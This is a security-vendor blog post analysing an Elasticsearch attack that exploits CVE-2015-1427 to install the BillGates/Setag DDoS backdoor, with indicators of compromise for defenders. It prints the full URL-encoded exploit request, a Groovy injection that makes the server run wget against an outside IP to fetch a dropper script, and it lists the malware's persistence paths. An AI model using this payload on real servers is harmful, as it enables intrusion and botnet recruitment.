• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Botnets   »   Multistage Attack Delivers BillGates/Setag Backdoor, Can Turn Elasticsearch Databases into DDoS Botnet ‘Zombies’

Multistage Attack Delivers BillGates/Setag Backdoor, Can Turn Elasticsearch Databases into DDoS Botnet ‘Zombies’

  • Posted on:July 23, 2019 at 5:00 am
  • Posted in:Botnets, Malware
  • Author:
    Trend Micro
0

By: Jindrich Karasek and Augusto Remillano II

Elasticsearch is no stranger to cybercriminal abuse given its popularity and use to organizations. In fact, this year’s first quarter saw a surge of attacks — whether by exploiting vulnerabilities or taking advantage of security gaps — leveled against Elasticsearch servers. These attacks mostly delivered cryptocurrency-mining malware, as in the case of one attack we saw last year.

The latest attack we spotted deviates from the usual profit-driven motive by delivering backdoors as its payload. These threats can turn affected targets into botnet zombies used in distributed-denial-of-service (DDoS) attacks.

The attack chain involves searching for exposed or publicly accessible Elasticsearch databases/servers. The malware would invoke a shell with an attacker-crafted search query with encoded Java commands. Once this is successfully carried out, the first malicious script is downloaded from a domain, which, in our analysis, appear to be expendable or easy-to-replace. The first-stage script will attempt to shut down the firewall as well as competing and already-running cryptocurrency mining activities and other processes. The second-stage script is then retrieved, likely from a compromised website.

The ways that the scripts are retrieved are notable. Using expendable domains, for instance, allows the attackers to swap URLs as soon as they are detected. Abusing compromised websites can also let them evade detection of websites especially developed by the attackers.


Figure 1. The attack’s infection chain

Attack Chain
In the attack we saw, the URL involved was designed to exploit CVE-2015-1427, an old and already-updated vulnerability in the Groovy scripting engine of Elasticsearch (versions 1.3.0 – 1.3.7 and 1.4.0 – 1.4.2), as shown below (highlighted):

request_url=”3[.]17[.]149[.]255[:]9200/_search?source=%7B%22query%22%3A+%7B%22filtered%22%3A+%7B%22query%22%3A+%7B%22match_all%22%3A+%7B%7D%7D%7D%7D%2C+%22script_fields%22%3A+%7B%22exp%22%3A+%7B%22script%22%3A+%22import+java.util.%2A%3Bimport+java.io.%2A%3BString+str+%3D+%5C%22%5C%22%3BBufferedReader+br+%3D+new+BufferedReader%28new+InputStreamReader%28Runtime.getRuntime%28%29.exec%28%5C%22wget+154.223.159.5%2Fs67.sh+-O+S67%5C%22%29.getInputStream%28%29%29%29%3BStringBuilder+sb+%3D+new+StringBuilder%28%29%3Bwhile%28%28str%3Dbr.readLine%28%29%29%21%3Dnull%29%7Bsb.append%28str%29%3Bsb.append%28%5C%22%5Cr%5Cn%5C%22%29%3B%7Dsb.toString%28%29%3B%22%7D%7D%2C+%22size%22%3A+1%7D

The attack has two stages. First, the dropper runs the script s67.sh, shown in Figure 2. It defines which shell to use and where to find it, then attempt to stop the firewall. It will download the second-stage script (s66.sh) using the curl command, or use wget if unsuccessful.

The second-stage script has functions similar to those of the first; it also defines which shell to use and stops the firewall. Conversely, this script removes certain files — possibly those related to competing cryptocurrency miners — as well as various configuration files from the /tmp directory. It then kills other or already-existing cryptocurrency mining activities as well as other unwanted processes in order to run its own operation. The script will then remove traces of initial infection and kill processes running on certain TCP ports, as shown in Figure 4. The attack’s second stage also entails downloading the actual binary (figure 5), which is most likely hosted on a compromised or gray website.


Figure 2. Code snippet showing the first-stage script


Figure 3. Code snippet of the second-stage script showing the processes it kills


Figure 4. Code snippet showing how processes in TCP ports are terminated


Figure 5. Code snippet showing the function of binary/payload

BillGates/Setag Payloads
A closer look into the binaries revealed a backdoor variant (detected by Trend Micro as ELF_SETAG.SM) that steals system information and has the capability to launch DDoS attacks. This same backdoor was also seen using an exploit for CVE-2017-5638, a remote-code-execution vulnerability in Apache Struts 2.

The samples bear the hallmarks of the BillGates malware, first encountered in 2014 and known for being used to hijack systems and initiate DDoS attacks. Of late, we’ve seen variants of the BillGates malware involved in botnet-related activities.

Figure 6 show code snippets of the payload. It has codes that can deter debugging and checks if it has been tampered with. This malware also replaces the affected system’s systools (which enables viewing of system or device information) with a copy of itself, and transfers them to the /usr/bin/dpkgd directory. For persistence, it drops a script that will create a copy of itself into the following paths:

  • /etc/rc{1-5}.d/S97DbSecuritySpt
  • /etc/rc{1-5}.d/S99selinux
  • /etc/init.d/selinux
  • /etc/init.d/DbSecuritySpt


Figure 6. Code snippets showing the BillGate malware’s functions: anti-debugging (top left), multistage execution (top center), the kinds of DDoS attacks it can initiate (top right); and the list of systools it replaces(bottom)

Laying the Groundwork
Indeed, many of the malicious traffic or attacks that we see targeting Elasticsearch are relatively straightforward, and more often than not, profit-driven. An attacker looks for unsecure or misconfigured servers or exploit old vulnerabilities, then drop the final payloads that typically consist of cryptocurrency-mining malware or even ransomware.

Hence, an attack that takes precautions to evade detection and uses multistage execution techniques is a red flag. That the cybercriminals or threat actors behind this attack used URL encoding, staged where the scripts are retrieved, and compromised legitimate websites could mean they are just testing their hacking tools or readying their infrastructure before mounting actual attacks.

This attack highlights the importance of properly securing digital assets, as the impact of an unsecure Elasticsearch server can have real-life repercussions. Note that Elastic has already released a patch for the vulnerability this attack exploits, as well as guidelines on how to secure, properly configure, and enable its security features. Additional security mechanisms like data categorization, network segmentation, and intrusion prevention systems helps reduce further exposure to malware and breaches.

Trend Micro Solutions
Organizations can also adopt security solutions that defend against these kinds of threats. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs):
Hashes Detected as ELF_SETAG.SM (SHA-256):

  • 8ebd963f86ba62f45b936f6d6687ccb1e349a0f8a6cc19286457895c885695c8 (.pprt)
  • cfe3dccf9ba5a17e410e8e7cf8d0ff5c1b8688f99881b53933006250b6421468 (.ppol)

Related domains/URLs:

  • hxxps://crazydavesslots[.]com/[.]ppol
  • hxxp://aduidc[.]xyz

With additional analysis by Tony Bao

Related posts:

  • Fileless Banking Trojan Targeting Brazilian Banks Downloads Possible Botnet Capability, Info Stealers
Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: BillGatesDDoSElasticsearchSetag

Featured Stories

  • systemd Vulnerability Leads to Denial of Service on Linux
  • qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware
  • Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
  • A Closer Look at North Korea’s Internet
  • From Cybercrime to Cyberpropaganda

Security Predictions for 2019

  • Our security predictions for 2019 are based on our experts’ analysis of the progress of current and emerging technologies, user behavior, and market trends, and their impact on the threat landscape. We have categorized them according to the main areas that are likely to be affected, given the sprawling nature of the technological and sociopolitical changes under consideration.
    Read our security predictions for 2019.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Obfuscation Tools Found in the Capesand Exploit Kit Possibly Used in “KurdishCoder” Campaign
  • Mobile Cyberespionage Campaign Distributed Through CallerSpy Mounts Initial Phase of a Targeted Attack
  • Operation ENDTRADE: Finding Multi-Stage Backdoors that TICK
  • Patched GIF Processing Vulnerability CVE-2019-11932 Still Afflicts Multiple Mobile Apps
  • Mac Backdoor Linked to Lazarus Targets Korean Users

Popular Posts

  • Mac Backdoor Linked to Lazarus Targets Korean Users
  • New Magecart Attack Delivered Through Compromised Advertising Supply Chain
  • 49 Disguised Adware Apps With Optimized Evasion Features Found on Google Play
  • September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days
  • Microsoft November 2019 Patch Tuesday Reveals 74 Patches Before Major Windows Update

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.